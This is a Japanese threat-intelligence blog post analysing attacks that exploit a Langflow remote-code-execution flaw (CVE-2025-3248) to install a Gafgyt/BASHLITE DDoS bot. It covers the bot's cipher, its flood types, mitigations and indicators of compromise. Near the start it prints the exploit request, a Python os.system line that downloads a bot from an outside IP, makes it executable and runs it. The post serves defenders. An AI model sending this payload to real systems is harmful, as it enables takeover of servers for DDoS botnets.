重要ポイント
攻撃者らは、AIや大規模言語モデル(LLM)アプリケーションのプロトタイピングに広く利用されている視覚的フレームワーク「Langflow」のコード検証APIエンドポイントに存在する、リモートコード実行(RCE)の脆弱性を悪用していることが確認されています。
フレームワークが侵害されると、攻撃者はカスタマイズされたGafgytのDDoSボット(分散型サービス拒否攻撃用ボット)の最新バリエーションを展開します。このペイロードは、暗号マイニングなどの二次的な機能を排除し、ネットワーク洪水攻撃に特化しています。さらに、標準的な自動デコードツールを回避するために、複雑な改良型RC4ストリーム暗号を用いて、コマンド&コントロール(C2)通信を隠蔽しています。
企業におけるAI開発は急速に進歩しているため、チームはLangflowなどの実験的なツールを、本番環境やステージング環境に、適切なネットワーク分離やファイアウォール保護、厳格なアウトバウンド通信フィルタリングなしで頻繁に導入しています。これにより、悪意のあるアウトバウンドC2トラフィックが企業のセキュリティフィルターを簡単に回避できる、非常に信頼性の高い環境が作り出されています。
AIインフラを保護するには、基本的なセキュリティ対策に立ち返る必要があります。具体的には、AIオーケストレータにおける任意のコード実行脆弱性へのパッチ適用、不正なトラフィック(ポート1337番を超えるものなど)を遮断する厳格なアウトバウンド通信フィルタリング、ウェブアプリケーションファイアウォール(WAF)による開発環境の分離、および特定のYARAシグネチャの導入が挙げられます。
サイバーセキュリティ業界は、過去数年間、自動化されたフィッシングやディープフェイク、自律型マルウェアなどの高度なAIによる脅威について懸念を抱いてきました。しかし、サイバー攻撃者は、彼らの当面の目標がはるかに現実的であることを証明している。彼らはAIを操作するだけでなく、その基盤となるインフラを乗っ取り、従来の大量のサイバー犯罪に悪用しようとしている。
最近の脅威インテリジェンスによると、現代のAI技術と従来のボットネット構造が興味深い形で融合していることが明らかになりました。攻撃者は、LangflowのRCE脆弱性であるCVE-2025-3248を悪用し、高度にカスタマイズされたGafgyt/BASHLITE DDoSボットのバリエーションを拡散しています。
このブログ記事では、攻撃者がCVE-2025-3248を悪用し、最先端のAIフレームワークをブルートフォース攻撃用のネットワーク兵器に変貌させている手口について解説します。
最初の足がかりCVE-2025-3248
{
"code": "import os; os.system(\"wget -q -O /tmp/bot_x86_64 http://184.174.96.191:8088/bot.x86_64 && chmod +x /tmp/bot_x86_64 && /tmp/bot_x86_64\")"
}
脆弱性の構造解析
脆弱性:`/api/v1/validate/code` エンドポイントは、信頼できないPythonスクリプトを受け入れ、適切なサンドボックス環境を設けずにホストシステム上で実行します。
配送:インジェクションされたコードは、標準のPythonライブラリ関数(os.system)を使用してwgetを実行します。
検索結果:リモートサーバー(184.174.96.191:8088)からx86_64 Linux用実行ファイルを静かにダウンロードし、実行権限を付与(chmod +x)した後、一時ディレクトリ(/tmp)から直接実行します。
分析:Gafgyt/BASHLITEの亜種
実行行動と回避行動
起動時に、このバイナリは自身の存在を隠し、内部エンジンを準備するための一連の処理を実行します。
指紋:これは、セキュリティジャーナリストのブライアン・クレブスと俳優のリマスタ(ハンドルネーム)を引用し、「来いよ、クレブス、リマスタ、ゴーBRRT」という挑発的なASCIIバナーを標準出力に表示します。
デーモン:親プロセスは終了し、子プロセスを生成するために、即座にclone()を呼び出します。その後、標準入力、出力、エラー記述子(stdio)を閉じ、端末から完全に切り離されて、バックグラウンドで静かに動作します。
純粋な攻撃性このバイナリには、暗号通貨マイニングツール 、永続化機能、および 横方向移動スキャナーは含まれていません。その実行プロセス全体は、ネットワーク洪水という単一の目的に特化して最適化されています。
カスタム暗号とC2プロトコル
このバリアントは、C2通信のセキュリティを確保するために、高度な多段階の改良型RC4ストリーム暗号を実装しています。この暗号化方式は、標準的な自動復号ツールを無力化するために、RC4の標準方式から3つの点で意図的に異なる設計が施されています。
非標準Sボックスシード:暗号化方式では、Sボックスを線形に初期化するのではなく、独自の算術数列を用いて値を設定しています。$S[i]=(0x0D + I\times 0xA7)\Pmod {256}$
2段階鍵スケジュールアルゴリズム(KSA)この手法では、Sボックスの変異にハードコードされた32ビットキー(0xDEADBEEF、0xCAFEBABEなど)を使用し、その後、Borlandの古典的な線形合同法(LCG)によるシャッフル処理を5回繰り返します。
改良型疑似乱数生成アルゴリズム(PRGA)キーストリームバイトは、シフト式ローリングカウンタとビット演算(ROLおよびSHR )を用いてさらにスクランブルされます。
攻撃能力
このボットは、sendtoシステムコールに直接対応する4つの異なる実行経路を備えており、4つの古典的なDoS攻撃手法と一致しています。
都道府県 | 攻撃ベクトル | 技術的メカニズム |
|---|---|---|
0x01 | UDP フラッド | 大量のUDPデータグラムを送信する生sendtoループ |
0x02 | TCP フラッド | 接続とSYN/ACKパケットのスパム攻撃 |
0x03 | HOLD フラッド | ウェブサーバーを標的としたキープアライブ接続の枯渇攻撃 |
0x04 | ジャンク/STDフラッド | ランダムなペイロードを含むUDPフラッド攻撃により、ターゲットのステートテーブルを枯渇させる。 |
AIインフラストラクチャが抱える戦略的リスク
AIアプリケーションを企業IT環境から切り離された特殊な領域と考えるのは自然なことですが、サイバー攻撃者はそれを格好の標的とみなしています。ボットネットのためにAIサーバーを乗っ取ることは、いくつかの明確な利点をもたらします。
膨大な計算能力と通信帯域幅AIのワークロードは、ほとんどの場合、高性能なクラウドインスタンスや堅牢なエンタープライズサーバー上で実行されます。これらのマシンは、破壊的なDDoS攻撃を実行するために必要な膨大なネットワーク帯域幅を備えています。
「シャドーIT」の脆弱性AI開発の進歩は目覚ましく、チームはしばしばLangflowのような実験的なプラットフォームを、本番環境やステージング環境に、適切なネットワークセグメンテーションや脆弱性管理、ファイアウォール保護なしで導入することがあります。
信頼できる環境:エンタープライズクラウドインフラは、外部向けのネットワーク権限が広く設定されていることが多く、アウトバウンドのC2トラフィックが通常の企業ネットワークの出口フィルターを回避できる場合があります。
防御と緩和
あなたのチームがLangflowや同様の視覚的AIオーケストレーションツールを使用している場合、直ちに防御体制の見直しを行うことを強く推奨します。
パッチとアップグレード:Langflowのデプロイ環境を、コード検証APIの任意コード実行脆弱性を修正したバージョンにアップデートしてください。
厳格な出口フィルタリングを実装してください。AIのトレーニングやプロトタイピング環境では、任意のパブリックIPアドレスへの無制限なアウトバウンドTCPアクセスが必要になることはほとんどありません。通常とは異なるポート(例:1337など)からのアウトバウンド接続をブロックしてください。
ネットワーク分離:AI開発環境は信頼できないネットワークとして扱うべきです。主要な企業環境から厳格に分離し、WAF(ウェブアプリケーションファイアウォール)を用いてパブリックインターネットへのアクセスを制限してください。
YARAシグネチャをデプロイする:このアクターに固有の暗号化Sボックスシードバイトを、システムバイナリおよび揮発性ディレクトリで監視してください。0d b4 5b 02 a9 50 f7 9e.
結論
CVE-2025-3248の悪用は、セキュリティ環境が単に進化しているだけでなく、大きく変化していることを痛感させる出来事である。Langflowのような強力なAIフレームワークを企業システムに急速に統合する中で、私たちはこれらのプラットフォームを独立した特殊な環境と捉えることを避けなければなりません。攻撃者は、これらの環境が持つ計算能力と帯域幅の可能性をよく理解しており、何十年もの間ボットネットを支えてきた実績のある手法を用いて、それらを悪用しています。
AIインフラのセキュリティを確保するには、基本的なセキュリティ対策に立ち返る必要があります。具体的には、強固なネットワークセグメンテーション、厳格な外部通信フィルタリング、そして徹底したパッチ管理が求められます。次世代のAIアプリケーション開発競争において、私たちは過去のサイバー犯罪の影を断ち切ることはできません。
技術補足資料:IOCと防衛
ファイルおよびシステムのハッシュ値
SHA256: e00d92ca28a2cfd75e96f71fc0408747f04942657fcab0f2a25ce79bc3ad23a8
ELFビルドID(SHA1):523ae28b0833f9a68f4264d16c803ca5fdc771b9
ネットワークインジケーター
サーバー IP:184.174.96.191
マルウェアの設置ポート:8088/TCP(HTTPダウンロード)
C2 コマンドポート:1337/TCP(暗号化トラフィック)
ホストシグネチャ
ポート1337を介した外部IPへのアウトバウンド接続
/tmp ディレクトリから実行され、標準ファイルディスクリプタを即座に閉じる未認識のプロセス。
「come at me krebs rimasuta go BRRT」という文字列が、標準出力ログやメモリ内の文字列として表示されることがあります。
タグ